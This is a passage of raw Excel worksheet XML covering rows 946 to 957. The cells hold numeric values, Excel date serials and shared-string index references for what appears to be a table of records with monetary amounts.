        <v>0</v>
      </c>
      <c r="AF946" t="s">
        <v>7253</v>
      </c>
      <c r="AG946">
        <v>53215</v>
      </c>
      <c r="AH946">
        <v>14</v>
      </c>
      <c r="AJ946">
        <v>188</v>
      </c>
      <c r="AK946" t="s">
        <v>3558</v>
      </c>
      <c r="AL946" t="s">
        <v>7254</v>
      </c>
      <c r="AM946" t="s">
        <v>7255</v>
      </c>
      <c r="AN946" t="s">
        <v>68</v>
      </c>
      <c r="AO946">
        <v>2020</v>
      </c>
      <c r="AP946">
        <v>82306360111</v>
      </c>
      <c r="AQ946" t="s">
        <v>1577</v>
      </c>
      <c r="AR946" t="s">
        <v>7253</v>
      </c>
      <c r="AS946" t="s">
        <v>71</v>
      </c>
      <c r="AT946" t="s">
        <v>72</v>
      </c>
      <c r="AU946">
        <v>0</v>
      </c>
      <c r="AV946">
        <v>0</v>
      </c>
      <c r="AW946">
        <v>7</v>
      </c>
      <c r="AX946">
        <v>8</v>
      </c>
      <c r="AY946">
        <v>3</v>
      </c>
      <c r="AZ946">
        <v>2</v>
      </c>
      <c r="BA946" t="s">
        <v>17424</v>
      </c>
      <c r="BB946" t="s">
        <v>16033</v>
      </c>
      <c r="BC946" t="s">
        <v>11534</v>
      </c>
      <c r="BD946" t="s">
        <v>11535</v>
      </c>
    </row>
    <row r="947" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A947">
        <v>2779</v>
      </c>
      <c r="B947" t="s">
        <v>7256</v>
      </c>
      <c r="C947" t="s">
        <v>458</v>
      </c>
      <c r="D947" t="s">
        <v>7257</v>
      </c>
      <c r="E947" t="s">
        <v>843</v>
      </c>
      <c r="F947" t="s">
        <v>1368</v>
      </c>
      <c r="G947" s="1">
        <v>44265</v>
      </c>
      <c r="H947">
        <v>4934</v>
      </c>
      <c r="I947">
        <v>4934</v>
      </c>
      <c r="J947">
        <v>0</v>
      </c>
      <c r="K947">
        <v>1</v>
      </c>
      <c r="L947">
        <v>0</v>
      </c>
      <c r="M947">
        <v>0</v>
      </c>
      <c r="N947">
        <v>0</v>
      </c>
      <c r="O947">
        <v>0</v>
      </c>
      <c r="P947">
        <v>0</v>
      </c>
      <c r="Q947">
        <v>1</v>
      </c>
      <c r="R947">
        <v>2</v>
      </c>
      <c r="S947">
        <v>0</v>
      </c>
      <c r="T947">
        <v>1</v>
      </c>
      <c r="U947">
        <v>0</v>
      </c>
      <c r="V947">
        <v>2000</v>
      </c>
      <c r="W947">
        <v>0</v>
      </c>
      <c r="X947">
        <v>0</v>
      </c>
      <c r="Y947">
        <v>0</v>
      </c>
      <c r="Z947">
        <v>0</v>
      </c>
      <c r="AA947">
        <v>0</v>
      </c>
      <c r="AB947">
        <v>500</v>
      </c>
      <c r="AC947">
        <v>2000</v>
      </c>
      <c r="AD947">
        <v>0</v>
      </c>
      <c r="AE947">
        <v>1500</v>
      </c>
      <c r="AF947" t="s">
        <v>7256</v>
      </c>
      <c r="AG947">
        <v>29000</v>
      </c>
      <c r="AH947">
        <v>5</v>
      </c>
      <c r="AJ947">
        <v>154</v>
      </c>
      <c r="AK947" t="s">
        <v>3358</v>
      </c>
      <c r="AL947" t="s">
        <v>3358</v>
      </c>
      <c r="AM947" t="s">
        <v>7258</v>
      </c>
      <c r="AN947" t="s">
        <v>68</v>
      </c>
      <c r="AO947">
        <v>2006</v>
      </c>
      <c r="AP947">
        <v>81372147778</v>
      </c>
      <c r="AQ947">
        <v>81372147778</v>
      </c>
      <c r="AR947" t="s">
        <v>7259</v>
      </c>
      <c r="AS947" t="s">
        <v>71</v>
      </c>
      <c r="AT947" t="s">
        <v>72</v>
      </c>
      <c r="AU947">
        <v>0</v>
      </c>
      <c r="AV947">
        <v>0</v>
      </c>
      <c r="AW947">
        <v>0</v>
      </c>
      <c r="AX947">
        <v>0</v>
      </c>
      <c r="AY947">
        <v>3</v>
      </c>
      <c r="AZ947">
        <v>0</v>
      </c>
      <c r="BA947" t="s">
        <v>17324</v>
      </c>
      <c r="BB947" t="s">
        <v>16026</v>
      </c>
      <c r="BC947" t="s">
        <v>9638</v>
      </c>
      <c r="BD947" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="948" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A948">
        <v>4821</v>
      </c>
      <c r="B948" t="s">
        <v>7260</v>
      </c>
      <c r="C948" t="s">
        <v>129</v>
      </c>
      <c r="D948" t="s">
        <v>7261</v>
      </c>
      <c r="E948" t="s">
        <v>1977</v>
      </c>
      <c r="F948" t="s">
        <v>7262</v>
      </c>
      <c r="G948" s="1">
        <v>44159</v>
      </c>
      <c r="H948">
        <v>4982</v>
      </c>
      <c r="I948">
        <v>4982</v>
      </c>
      <c r="J948">
        <v>0</v>
      </c>
      <c r="K948">
        <v>1</v>
      </c>
      <c r="L948">
        <v>0</v>
      </c>
      <c r="M948">
        <v>0</v>
      </c>
      <c r="N948">
        <v>0</v>
      </c>
      <c r="O948">
        <v>0</v>
      </c>
      <c r="P948">
        <v>0</v>
      </c>
      <c r="Q948">
        <v>3</v>
      </c>
      <c r="R948">
        <v>3</v>
      </c>
      <c r="S948">
        <v>0</v>
      </c>
      <c r="T948">
        <v>1</v>
      </c>
      <c r="U948">
        <v>0</v>
      </c>
      <c r="V948">
        <v>5000</v>
      </c>
      <c r="W948">
        <v>0</v>
      </c>
      <c r="X948">
        <v>0</v>
      </c>
      <c r="Y948">
        <v>0</v>
      </c>
      <c r="Z948">
        <v>0</v>
      </c>
      <c r="AA948">
        <v>0</v>
      </c>
      <c r="AB948">
        <v>500</v>
      </c>
      <c r="AC948">
        <v>2000</v>
      </c>
      <c r="AD948">
        <v>0</v>
      </c>
      <c r="AE948">
        <v>10000</v>
      </c>
      <c r="AF948" t="s">
        <v>7263</v>
      </c>
      <c r="AG948">
        <v>15121</v>
      </c>
      <c r="AH948">
        <v>11</v>
      </c>
      <c r="AJ948">
        <v>270</v>
      </c>
      <c r="AK948" t="s">
        <v>620</v>
      </c>
      <c r="AL948" t="s">
        <v>7264</v>
      </c>
      <c r="AM948" t="s">
        <v>7265</v>
      </c>
      <c r="AN948" t="s">
        <v>68</v>
      </c>
      <c r="AO948">
        <v>2014</v>
      </c>
      <c r="AP948">
        <v>8218449977</v>
      </c>
      <c r="AQ948">
        <v>8218449977</v>
      </c>
      <c r="AR948" t="s">
        <v>7263</v>
      </c>
      <c r="AS948" t="s">
        <v>71</v>
      </c>
      <c r="AT948" t="s">
        <v>58</v>
      </c>
      <c r="AU948">
        <v>26</v>
      </c>
      <c r="AV948">
        <v>2</v>
      </c>
      <c r="AW948">
        <v>0</v>
      </c>
      <c r="AX948">
        <v>0</v>
      </c>
      <c r="AY948">
        <v>24</v>
      </c>
      <c r="AZ948">
        <v>5</v>
      </c>
      <c r="BA948" t="s">
        <v>17427</v>
      </c>
      <c r="BB948">
        <v>0</v>
      </c>
      <c r="BC948">
        <v>0</v>
      </c>
      <c r="BD948" t="s">
        <v>11105</v>
      </c>
    </row>
    <row r="949" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A949">
        <v>4761</v>
      </c>
      <c r="B949" t="s">
        <v>7266</v>
      </c>
      <c r="C949" t="s">
        <v>458</v>
      </c>
      <c r="D949" t="s">
        <v>7267</v>
      </c>
      <c r="E949" t="s">
        <v>843</v>
      </c>
      <c r="F949" t="s">
        <v>7268</v>
      </c>
      <c r="G949" s="1">
        <v>44118</v>
      </c>
      <c r="H949">
        <v>5020</v>
      </c>
      <c r="I949">
        <v>5020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t="s">
        <v>7269</v>
      </c>
      <c r="AG949">
        <v>29413</v>
      </c>
      <c r="AH949">
        <v>5</v>
      </c>
      <c r="AJ949">
        <v>153</v>
      </c>
      <c r="AK949" t="s">
        <v>7270</v>
      </c>
      <c r="AL949" t="s">
        <v>7271</v>
      </c>
      <c r="AM949" t="s">
        <v>7272</v>
      </c>
      <c r="AN949" t="s">
        <v>55</v>
      </c>
      <c r="AO949">
        <v>2020</v>
      </c>
      <c r="AP949">
        <v>8117552655</v>
      </c>
      <c r="AQ949" t="s">
        <v>7273</v>
      </c>
      <c r="AR949" t="s">
        <v>7274</v>
      </c>
      <c r="AU949">
        <v>26</v>
      </c>
      <c r="AV949">
        <v>1</v>
      </c>
      <c r="AW949">
        <v>1</v>
      </c>
      <c r="AX949">
        <v>0</v>
      </c>
      <c r="AY949">
        <v>3</v>
      </c>
      <c r="AZ949">
        <v>0</v>
      </c>
      <c r="BA949" t="s">
        <v>17389</v>
      </c>
      <c r="BB949" t="s">
        <v>16023</v>
      </c>
      <c r="BC949" t="s">
        <v>9638</v>
      </c>
      <c r="BD949" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="950" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A950">
        <v>2826</v>
      </c>
      <c r="B950" t="s">
        <v>7275</v>
      </c>
      <c r="C950" t="s">
        <v>99</v>
      </c>
      <c r="D950" t="s">
        <v>7276</v>
      </c>
      <c r="E950" t="s">
        <v>412</v>
      </c>
      <c r="F950" t="s">
        <v>7277</v>
      </c>
      <c r="G950" s="1">
        <v>44097</v>
      </c>
      <c r="H950">
        <v>5042</v>
      </c>
      <c r="I950">
        <v>5042</v>
      </c>
      <c r="J950">
        <v>1</v>
      </c>
      <c r="K950">
        <v>0</v>
      </c>
      <c r="L950">
        <v>1</v>
      </c>
      <c r="M950">
        <v>0</v>
      </c>
      <c r="N950">
        <v>0</v>
      </c>
      <c r="O950">
        <v>0</v>
      </c>
      <c r="P950">
        <v>0</v>
      </c>
      <c r="Q950">
        <v>0</v>
      </c>
      <c r="R950">
        <v>0</v>
      </c>
      <c r="S950">
        <v>0</v>
      </c>
      <c r="T950">
        <v>0</v>
      </c>
      <c r="U950">
        <v>500000</v>
      </c>
      <c r="V950">
        <v>0</v>
      </c>
      <c r="W950">
        <v>50000</v>
      </c>
      <c r="X950">
        <v>0</v>
      </c>
      <c r="Y950">
        <v>0</v>
      </c>
      <c r="Z950">
        <v>0</v>
      </c>
      <c r="AA950">
        <v>0</v>
      </c>
      <c r="AB950">
        <v>0</v>
      </c>
      <c r="AC950">
        <v>0</v>
      </c>
      <c r="AD950">
        <v>0</v>
      </c>
      <c r="AE950">
        <v>0</v>
      </c>
      <c r="AF950" t="s">
        <v>7278</v>
      </c>
      <c r="AG950">
        <v>14440</v>
      </c>
      <c r="AH950">
        <v>12</v>
      </c>
      <c r="AJ950">
        <v>160</v>
      </c>
      <c r="AK950" t="s">
        <v>114</v>
      </c>
      <c r="AL950" t="s">
        <v>114</v>
      </c>
      <c r="AM950" t="s">
        <v>7279</v>
      </c>
      <c r="AN950" t="s">
        <v>55</v>
      </c>
      <c r="AO950">
        <v>2020</v>
      </c>
      <c r="AP950">
        <v>85394162480</v>
      </c>
      <c r="AQ950" t="s">
        <v>7280</v>
      </c>
      <c r="AR950" t="s">
        <v>7281</v>
      </c>
      <c r="AS950" t="s">
        <v>187</v>
      </c>
      <c r="AT950" t="s">
        <v>58</v>
      </c>
      <c r="AU950">
        <v>24</v>
      </c>
      <c r="AV950">
        <v>0</v>
      </c>
      <c r="AW950">
        <v>0</v>
      </c>
      <c r="AX950">
        <v>0</v>
      </c>
      <c r="AY950">
        <v>17</v>
      </c>
      <c r="AZ950">
        <v>6</v>
      </c>
      <c r="BA950" t="s">
        <v>17362</v>
      </c>
      <c r="BB950" t="s">
        <v>17446</v>
      </c>
      <c r="BC950" t="s">
        <v>9550</v>
      </c>
      <c r="BD950" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="951" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A951">
        <v>4811</v>
      </c>
      <c r="B951" t="s">
        <v>7282</v>
      </c>
      <c r="C951" t="s">
        <v>99</v>
      </c>
      <c r="D951" t="s">
        <v>7283</v>
      </c>
      <c r="E951" t="s">
        <v>142</v>
      </c>
      <c r="F951" t="s">
        <v>7284</v>
      </c>
      <c r="G951" s="1">
        <v>44095</v>
      </c>
      <c r="H951">
        <v>5051</v>
      </c>
      <c r="I951">
        <v>5051</v>
      </c>
      <c r="J951">
        <v>1</v>
      </c>
      <c r="K951">
        <v>0</v>
      </c>
      <c r="L951">
        <v>1</v>
      </c>
      <c r="M951">
        <v>0</v>
      </c>
      <c r="N951">
        <v>0</v>
      </c>
      <c r="O951">
        <v>0</v>
      </c>
      <c r="P951">
        <v>0</v>
      </c>
      <c r="Q951">
        <v>0</v>
      </c>
      <c r="R951">
        <v>0</v>
      </c>
      <c r="S951">
        <v>0</v>
      </c>
      <c r="T951">
        <v>0</v>
      </c>
      <c r="U951">
        <v>500000</v>
      </c>
      <c r="V951">
        <v>0</v>
      </c>
      <c r="W951">
        <v>50000</v>
      </c>
      <c r="X951">
        <v>0</v>
      </c>
      <c r="Y951">
        <v>0</v>
      </c>
      <c r="Z951">
        <v>0</v>
      </c>
      <c r="AA951">
        <v>0</v>
      </c>
      <c r="AB951">
        <v>0</v>
      </c>
      <c r="AC951">
        <v>0</v>
      </c>
      <c r="AD951">
        <v>0</v>
      </c>
      <c r="AE951">
        <v>0</v>
      </c>
      <c r="AF951" t="s">
        <v>7285</v>
      </c>
      <c r="AG951">
        <v>14440</v>
      </c>
      <c r="AH951">
        <v>12</v>
      </c>
      <c r="AJ951">
        <v>160</v>
      </c>
      <c r="AK951" t="s">
        <v>114</v>
      </c>
      <c r="AL951" t="s">
        <v>114</v>
      </c>
      <c r="AM951" t="s">
        <v>7286</v>
      </c>
      <c r="AN951" t="s">
        <v>68</v>
      </c>
      <c r="AO951">
        <v>2020</v>
      </c>
      <c r="AP951">
        <v>85394162480</v>
      </c>
      <c r="AQ951" t="s">
        <v>7287</v>
      </c>
      <c r="AR951" t="s">
        <v>7288</v>
      </c>
      <c r="AS951" t="s">
        <v>179</v>
      </c>
      <c r="AT951" t="s">
        <v>72</v>
      </c>
      <c r="AU951">
        <v>24</v>
      </c>
      <c r="AV951">
        <v>0</v>
      </c>
      <c r="AW951">
        <v>0</v>
      </c>
      <c r="AX951">
        <v>0</v>
      </c>
      <c r="AY951">
        <v>17</v>
      </c>
      <c r="AZ951">
        <v>6</v>
      </c>
      <c r="BA951" t="s">
        <v>17422</v>
      </c>
      <c r="BB951">
        <v>0</v>
      </c>
      <c r="BC951" t="s">
        <v>9550</v>
      </c>
      <c r="BD951" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="952" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A952">
        <v>4810</v>
      </c>
      <c r="B952" t="s">
        <v>7289</v>
      </c>
      <c r="C952" t="s">
        <v>99</v>
      </c>
      <c r="D952" t="s">
        <v>7290</v>
      </c>
      <c r="E952" t="s">
        <v>142</v>
      </c>
      <c r="F952" t="s">
        <v>7291</v>
      </c>
      <c r="G952" s="1">
        <v>44095</v>
      </c>
      <c r="H952">
        <v>5059</v>
      </c>
      <c r="I952">
        <v>5059</v>
      </c>
      <c r="J952">
        <v>1</v>
      </c>
      <c r="K952">
        <v>0</v>
      </c>
      <c r="L952">
        <v>1</v>
      </c>
      <c r="M952">
        <v>0</v>
      </c>
      <c r="N952">
        <v>0</v>
      </c>
      <c r="O952">
        <v>0</v>
      </c>
      <c r="P952">
        <v>0</v>
      </c>
      <c r="Q952">
        <v>0</v>
      </c>
      <c r="R952">
        <v>0</v>
      </c>
      <c r="S952">
        <v>0</v>
      </c>
      <c r="T952">
        <v>0</v>
      </c>
      <c r="U952">
        <v>500000</v>
      </c>
      <c r="V952">
        <v>0</v>
      </c>
      <c r="W952">
        <v>50000</v>
      </c>
      <c r="X952">
        <v>0</v>
      </c>
      <c r="Y952">
        <v>0</v>
      </c>
      <c r="Z952">
        <v>0</v>
      </c>
      <c r="AA952">
        <v>0</v>
      </c>
      <c r="AB952">
        <v>0</v>
      </c>
      <c r="AC952">
        <v>0</v>
      </c>
      <c r="AD952">
        <v>0</v>
      </c>
      <c r="AE952">
        <v>0</v>
      </c>
      <c r="AF952" t="s">
        <v>7292</v>
      </c>
      <c r="AG952">
        <v>14440</v>
      </c>
      <c r="AH952">
        <v>12</v>
      </c>
      <c r="AJ952">
        <v>160</v>
      </c>
      <c r="AK952" t="s">
        <v>114</v>
      </c>
      <c r="AL952" t="s">
        <v>114</v>
      </c>
      <c r="AM952" t="s">
        <v>7293</v>
      </c>
      <c r="AN952" t="s">
        <v>55</v>
      </c>
      <c r="AO952">
        <v>2020</v>
      </c>
      <c r="AP952">
        <v>85394162480</v>
      </c>
      <c r="AQ952" t="s">
        <v>7287</v>
      </c>
      <c r="AR952" t="s">
        <v>7285</v>
      </c>
      <c r="AS952" t="s">
        <v>179</v>
      </c>
      <c r="AT952" t="s">
        <v>58</v>
      </c>
      <c r="AU952">
        <v>24</v>
      </c>
      <c r="AV952">
        <v>0</v>
      </c>
      <c r="AW952">
        <v>0</v>
      </c>
      <c r="AX952">
        <v>0</v>
      </c>
      <c r="AY952">
        <v>17</v>
      </c>
      <c r="AZ952">
        <v>6</v>
      </c>
      <c r="BA952" t="s">
        <v>17421</v>
      </c>
      <c r="BB952">
        <v>0</v>
      </c>
      <c r="BC952" t="s">
        <v>9550</v>
      </c>
      <c r="BD952" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="953" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A953">
        <v>2742</v>
      </c>
      <c r="B953" t="s">
        <v>7294</v>
      </c>
      <c r="C953" t="s">
        <v>168</v>
      </c>
      <c r="D953" t="s">
        <v>7295</v>
      </c>
      <c r="E953" t="s">
        <v>843</v>
      </c>
      <c r="F953" t="s">
        <v>7296</v>
      </c>
      <c r="G953" s="1">
        <v>44151</v>
      </c>
      <c r="H953">
        <v>5107</v>
      </c>
      <c r="I953">
        <v>5107</v>
      </c>
      <c r="J953">
        <v>4</v>
      </c>
      <c r="K953">
        <v>6</v>
      </c>
      <c r="L953">
        <v>0</v>
      </c>
      <c r="M953">
        <v>0</v>
      </c>
      <c r="N953">
        <v>0</v>
      </c>
      <c r="O953">
        <v>0</v>
      </c>
      <c r="P953">
        <v>0</v>
      </c>
      <c r="Q953">
        <v>0</v>
      </c>
      <c r="R953">
        <v>0</v>
      </c>
      <c r="S953">
        <v>1</v>
      </c>
      <c r="T953">
        <v>0</v>
      </c>
      <c r="U953">
        <v>12</v>
      </c>
      <c r="V953">
        <v>5</v>
      </c>
      <c r="W953">
        <v>0</v>
      </c>
      <c r="X953">
        <v>0</v>
      </c>
      <c r="Y953">
        <v>0</v>
      </c>
      <c r="Z953">
        <v>0</v>
      </c>
      <c r="AA953">
        <v>0</v>
      </c>
      <c r="AB953">
        <v>0</v>
      </c>
      <c r="AC953">
        <v>0</v>
      </c>
      <c r="AD953">
        <v>1</v>
      </c>
      <c r="AE953">
        <v>0</v>
      </c>
      <c r="AF953" t="s">
        <v>7297</v>
      </c>
      <c r="AG953">
        <v>17152</v>
      </c>
      <c r="AH953">
        <v>13</v>
      </c>
      <c r="AJ953">
        <v>183</v>
      </c>
      <c r="AK953" t="s">
        <v>7298</v>
      </c>
      <c r="AL953" t="s">
        <v>7299</v>
      </c>
      <c r="AM953" t="s">
        <v>7300</v>
      </c>
      <c r="AN953" t="s">
        <v>82</v>
      </c>
      <c r="AO953">
        <v>2012</v>
      </c>
      <c r="AP953" t="s">
        <v>7301</v>
      </c>
      <c r="AQ953" t="s">
        <v>7302</v>
      </c>
      <c r="AR953" t="s">
        <v>7303</v>
      </c>
      <c r="AU953">
        <v>6</v>
      </c>
      <c r="AV953">
        <v>3</v>
      </c>
      <c r="AW953">
        <v>825</v>
      </c>
      <c r="AX953">
        <v>48</v>
      </c>
      <c r="AY953">
        <v>240</v>
      </c>
      <c r="AZ953">
        <v>34</v>
      </c>
      <c r="BA953" t="s">
        <v>17303</v>
      </c>
      <c r="BB953" t="s">
        <v>15931</v>
      </c>
      <c r="BC953" t="s">
        <v>11516</v>
      </c>
      <c r="BD953">
        <v>0</v>
      </c>
    </row>
    <row r="954" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A954">
        <v>4809</v>
      </c>
      <c r="B954" t="s">
        <v>7304</v>
      </c>
      <c r="C954" t="s">
        <v>157</v>
      </c>
      <c r="D954" t="s">
        <v>7305</v>
      </c>
      <c r="E954" t="s">
        <v>627</v>
      </c>
      <c r="F954" t="s">
        <v>7306</v>
      </c>
      <c r="G954" s="1">
        <v>44369</v>
      </c>
      <c r="H954">
        <v>5120</v>
      </c>
      <c r="I954">
        <v>5120</v>
      </c>
      <c r="J954">
        <v>1</v>
      </c>
      <c r="K954">
        <v>0</v>
      </c>
      <c r="L954">
        <v>1</v>
      </c>
      <c r="M954">
        <v>0</v>
      </c>
      <c r="N954">
        <v>0</v>
      </c>
      <c r="O954">
        <v>0</v>
      </c>
      <c r="P954">
        <v>0</v>
      </c>
      <c r="Q954">
        <v>2</v>
      </c>
      <c r="R954">
        <v>1</v>
      </c>
      <c r="S954">
        <v>0</v>
      </c>
      <c r="T954">
        <v>1</v>
      </c>
      <c r="U954">
        <v>2000</v>
      </c>
      <c r="V954">
        <v>0</v>
      </c>
      <c r="W954">
        <v>2000</v>
      </c>
      <c r="X954">
        <v>0</v>
      </c>
      <c r="Y954">
        <v>0</v>
      </c>
      <c r="Z954">
        <v>0</v>
      </c>
      <c r="AA954">
        <v>0</v>
      </c>
      <c r="AB954">
        <v>500</v>
      </c>
      <c r="AC954">
        <v>500</v>
      </c>
      <c r="AD954">
        <v>0</v>
      </c>
      <c r="AE954">
        <v>1000</v>
      </c>
      <c r="AF954" t="s">
        <v>7307</v>
      </c>
      <c r="AG954">
        <v>61254</v>
      </c>
      <c r="AH954">
        <v>16</v>
      </c>
      <c r="AJ954">
        <v>242</v>
      </c>
      <c r="AK954" t="s">
        <v>490</v>
      </c>
      <c r="AL954" t="s">
        <v>7308</v>
      </c>
      <c r="AM954" t="s">
        <v>7309</v>
      </c>
      <c r="AN954" t="s">
        <v>55</v>
      </c>
      <c r="AO954">
        <v>2013</v>
      </c>
      <c r="AP954" t="s">
        <v>7310</v>
      </c>
      <c r="AQ954" t="s">
        <v>7311</v>
      </c>
      <c r="AR954" t="s">
        <v>7312</v>
      </c>
      <c r="AS954" t="s">
        <v>71</v>
      </c>
      <c r="AT954" t="s">
        <v>58</v>
      </c>
      <c r="AU954">
        <v>25</v>
      </c>
      <c r="AV954">
        <v>1</v>
      </c>
      <c r="AW954">
        <v>6</v>
      </c>
      <c r="AX954">
        <v>0</v>
      </c>
      <c r="AY954">
        <v>2</v>
      </c>
      <c r="AZ954">
        <v>2</v>
      </c>
      <c r="BA954" t="s">
        <v>17380</v>
      </c>
      <c r="BB954">
        <v>0</v>
      </c>
      <c r="BC954">
        <v>0</v>
      </c>
      <c r="BD954" t="s">
        <v>11093</v>
      </c>
    </row>
    <row r="955" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A955">
        <v>4817</v>
      </c>
      <c r="B955" t="s">
        <v>7313</v>
      </c>
      <c r="C955" t="s">
        <v>129</v>
      </c>
      <c r="D955" t="s">
        <v>7314</v>
      </c>
      <c r="E955" t="s">
        <v>300</v>
      </c>
      <c r="F955" t="s">
        <v>7315</v>
      </c>
      <c r="G955" s="1">
        <v>44126</v>
      </c>
      <c r="H955">
        <v>5127</v>
      </c>
      <c r="I955">
        <v>5127</v>
      </c>
      <c r="J955">
        <v>1</v>
      </c>
      <c r="K955">
        <v>0</v>
      </c>
      <c r="L955">
        <v>0</v>
      </c>
      <c r="M955">
        <v>0</v>
      </c>
      <c r="N955">
        <v>0</v>
      </c>
      <c r="O955">
        <v>0</v>
      </c>
      <c r="P955">
        <v>0</v>
      </c>
      <c r="Q955">
        <v>2</v>
      </c>
      <c r="R955">
        <v>2</v>
      </c>
      <c r="S955">
        <v>0</v>
      </c>
      <c r="T955">
        <v>0</v>
      </c>
      <c r="U955">
        <v>5000</v>
      </c>
      <c r="V955">
        <v>0</v>
      </c>
      <c r="W955">
        <v>0</v>
      </c>
      <c r="X955">
        <v>0</v>
      </c>
      <c r="Y955">
        <v>0</v>
      </c>
      <c r="Z955">
        <v>0</v>
      </c>
      <c r="AA955">
        <v>0</v>
      </c>
      <c r="AB955">
        <v>100</v>
      </c>
      <c r="AC955">
        <v>100</v>
      </c>
      <c r="AD955">
        <v>0</v>
      </c>
      <c r="AE955">
        <v>0</v>
      </c>
      <c r="AF955" t="s">
        <v>7316</v>
      </c>
      <c r="AG955">
        <v>15147</v>
      </c>
      <c r="AH955">
        <v>11</v>
      </c>
      <c r="AJ955">
        <v>270</v>
      </c>
      <c r="AK955" t="s">
        <v>7317</v>
      </c>
      <c r="AL955" t="s">
        <v>7318</v>
      </c>
      <c r="AM955" t="s">
        <v>7319</v>
      </c>
      <c r="AN955" t="s">
        <v>55</v>
      </c>
      <c r="AO955">
        <v>2020</v>
      </c>
      <c r="AP955">
        <v>85284088878</v>
      </c>
      <c r="AQ955" t="s">
        <v>7320</v>
      </c>
      <c r="AR955" t="s">
        <v>7316</v>
      </c>
      <c r="AS955" t="s">
        <v>179</v>
      </c>
      <c r="AT955" t="s">
        <v>58</v>
      </c>
      <c r="AU955">
        <v>24</v>
      </c>
      <c r="AV955">
        <v>1</v>
      </c>
      <c r="AW955">
        <v>0</v>
      </c>
      <c r="AX955">
        <v>0</v>
      </c>
      <c r="AY955">
        <v>8</v>
      </c>
      <c r="AZ955">
        <v>3</v>
      </c>
      <c r="BA955" t="s">
        <v>17425</v>
      </c>
      <c r="BB955">
        <v>0</v>
      </c>
      <c r="BC955" t="s">
        <v>11615</v>
      </c>
      <c r="BD955">
        <v>0</v>
      </c>
    </row>
    <row r="956" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A956">
        <v>2814</v>
      </c>
      <c r="B956" t="s">
        <v>7321</v>
      </c>
      <c r="C956" t="s">
        <v>99</v>
      </c>
      <c r="D956" t="s">
        <v>7322</v>
      </c>
      <c r="E956" t="s">
        <v>142</v>
      </c>
      <c r="F956" t="s">
        <v>7323</v>
      </c>
      <c r="G956" s="1">
        <v>44116</v>
      </c>
      <c r="H956">
        <v>5151</v>
      </c>
      <c r="I956">
        <v>5151</v>
      </c>
      <c r="J956">
        <v>1</v>
      </c>
      <c r="K956">
        <v>0</v>
      </c>
      <c r="L956">
        <v>0</v>
      </c>
      <c r="M956">
        <v>0</v>
      </c>
      <c r="N956">
        <v>0</v>
      </c>
      <c r="O956">
        <v>0</v>
      </c>
      <c r="P956">
        <v>0</v>
      </c>
      <c r="Q956">
        <v>0</v>
      </c>
      <c r="R956">
        <v>0</v>
      </c>
      <c r="S956">
        <v>0</v>
      </c>
      <c r="T956">
        <v>0</v>
      </c>
      <c r="U956">
        <v>200000</v>
      </c>
      <c r="V956">
        <v>0</v>
      </c>
      <c r="W956">
        <v>0</v>
      </c>
      <c r="X956">
        <v>0</v>
      </c>
      <c r="Y956">
        <v>0</v>
      </c>
      <c r="Z956">
        <v>0</v>
      </c>
      <c r="AA956">
        <v>0</v>
      </c>
      <c r="AB956">
        <v>0</v>
      </c>
      <c r="AC956">
        <v>0</v>
      </c>
      <c r="AD956">
        <v>0</v>
      </c>
      <c r="AE956">
        <v>0</v>
      </c>
      <c r="AF956" t="s">
        <v>7324</v>
      </c>
      <c r="AG956">
        <v>14470</v>
      </c>
      <c r="AH956">
        <v>12</v>
      </c>
      <c r="AJ956">
        <v>160</v>
      </c>
      <c r="AK956" t="s">
        <v>114</v>
      </c>
      <c r="AL956" t="s">
        <v>3996</v>
      </c>
      <c r="AM956" t="s">
        <v>7325</v>
      </c>
      <c r="AN956" t="s">
        <v>55</v>
      </c>
      <c r="AO956">
        <v>2020</v>
      </c>
      <c r="AP956" t="s">
        <v>7326</v>
      </c>
      <c r="AQ956" t="s">
        <v>7327</v>
      </c>
      <c r="AR956" t="s">
        <v>7328</v>
      </c>
      <c r="AS956" t="s">
        <v>179</v>
      </c>
      <c r="AT956" t="s">
        <v>58</v>
      </c>
      <c r="AU956">
        <v>26</v>
      </c>
      <c r="AV956">
        <v>0</v>
      </c>
      <c r="AW956">
        <v>5</v>
      </c>
      <c r="AX956">
        <v>0</v>
      </c>
      <c r="AY956">
        <v>8</v>
      </c>
      <c r="AZ956">
        <v>2</v>
      </c>
      <c r="BA956" t="s">
        <v>17349</v>
      </c>
      <c r="BB956" t="s">
        <v>17350</v>
      </c>
      <c r="BC956" t="s">
        <v>10031</v>
      </c>
      <c r="BD956" t="s">
        <v>11531</v>
      </c>
    </row>
    <row r="957" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A957">
        <v>4834</v>
      </c>
      <c r="B957" t="s">
        <v>7329</v>
      </c>
      <c r="C957" t="s">
        <v>99</v>
      </c>
      <c r="D957" t="s">
        <v>7330</v>
      </c>
      <c r="E957" t="s">
        <v>142</v>
      </c>
      <c r="F957" t="s">
        <v>7331</v>
      </c>
      <c r="G957" s="1">
        <v>44081</v>
      </c>
      <c r="H957">
        <v>5187</v>
      </c>
      <c r="I957">
        <v>5187</v>
      </c>
      <c r="J957">
        <v>0</v>
      </c>
      <c r="K957">
        <v>2</v>
      </c>
      <c r="L957">
        <v>0</v>
      </c>
      <c r="M957">
        <v>0</v>
      </c>
      <c r="N957">
        <v>0</v>
      </c>
      <c r="O957">
        <v>0</v>
      </c>
      <c r="P957">
        <v>0</v>
      </c>
      <c r="Q957">
        <v>2</v>
      </c>
      <c r="R957">
        <v>0</v>
      </c>
      <c r="S957">
        <v>0</v>
      </c>
      <c r="T957">
        <v>1</v>
      </c>
      <c r="U957">
        <v>0</v>
      </c>
      <c r="V957">
        <v>1200000</v>
      </c>
      <c r="W957">
        <v>0</v>
      </c>
      <c r="X957">
        <v>0</v>
      </c>
      <c r="Y957">
        <v>0</v>
      </c>
      <c r="Z957">
        <v>0</v>
      </c>
      <c r="AA957">
